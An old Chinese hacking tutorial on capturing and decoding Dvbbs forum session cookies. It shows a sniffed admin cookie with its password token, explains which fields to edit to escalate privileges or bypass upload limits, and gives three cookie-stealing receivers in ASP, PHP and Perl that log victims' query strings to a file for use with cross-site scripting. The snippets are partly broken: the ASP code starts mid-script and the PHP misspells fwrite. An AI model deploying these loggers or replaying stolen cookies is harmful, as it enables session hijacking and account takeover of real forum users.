[图文]教你怎样从cookie里获取信息
热 荐 ★★★★★
教你怎样从cookie里获取信息
网站安全版有人在问,怎么从cookies中提取信息,我用动网论坛的来说明一下。
使用工具:
1:WsockExpert,用来抓取cookies。
2:动网论坛7.1 sp1。
抓取cookies步骤:打开动网论坛的页面,用户登陆以后,打开WsockExpert后点击“打开进程“,选择ie中的动网论坛的页面,然后再到动网页面中随便点击一个版块,这时候WsockExpert中就有显示了。
其中cookies信息是
DvForum=userid=1&usercookies=0&userhidden=2&password=ChXJBnM9970wE067&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=4517632; ASPSESSIONIDCATCRCBA=KLOBIMEDCHPOEKGAHMLPBLJK; upNum=0
参数说明
DvForum是动网论坛。
userid=1表示你的用户名的id是1,也就是这个论坛的第1个用户。
userhidden如果是1表示隐身,2表示上线。
Password这里是ChXJBnM9970wE067,并不是真正登陆密码的md5加密以后的值。ChXJBnM9970wE067其实就是数据库中的TruePassWord中的值。有些获取的cookies中这里可能是明文密码或者是md5加密以后的密码,能不能破解就看你的运气了。
userclass=%B9%DC%C0%ED%D4%B1,表示用户级别是管理员,当然其它的级别也是同样的原理。
username=admin就不用我说了吧。
upNum=0表示你上传的文件数量,如果每天上传数量有限制的话,修改这里可能有些cookies会有效的。
修改cookies的工具: minibrowser等可以修改cookies的工具。
盗取cookies的asp代码
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request.Servervariables("QUERY_STRING")
lP.SaveToFile server.mappath(strfilename),2
lP.Close
set lP=nothing
%>
盗取cookies的php代码
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$info=urldecode($info);
$fp = fopen("info.txt","a");
fwirte($fp,$info."\n\n\n\n");
fclose($fp);
}
?>
盗取cookies的cgi代码
#!/usr/bin/perl
# evil_cookie_logger.cgi
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
# cross-site scripting vulnerabilities.
#玄猫摘自http://www.infosecurity.org.cn/c ... ticle0128051326.htm
$borrowed_info = $ENV{'QUERY_STRING'};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
open(EVIL_COOKIE_LOG, ">>evil_cookie_log") or print "Content-type:
text/html\n\n something went wrong\n";
print EVIL_COOKIE_LOG "$borrowed_info\n";
print "Content-type: text/html\n\n";
close(EVIL_COOKIE_LOG);
文章录入:cainiaowang 责任编辑:cainiaowang
您现在的位置: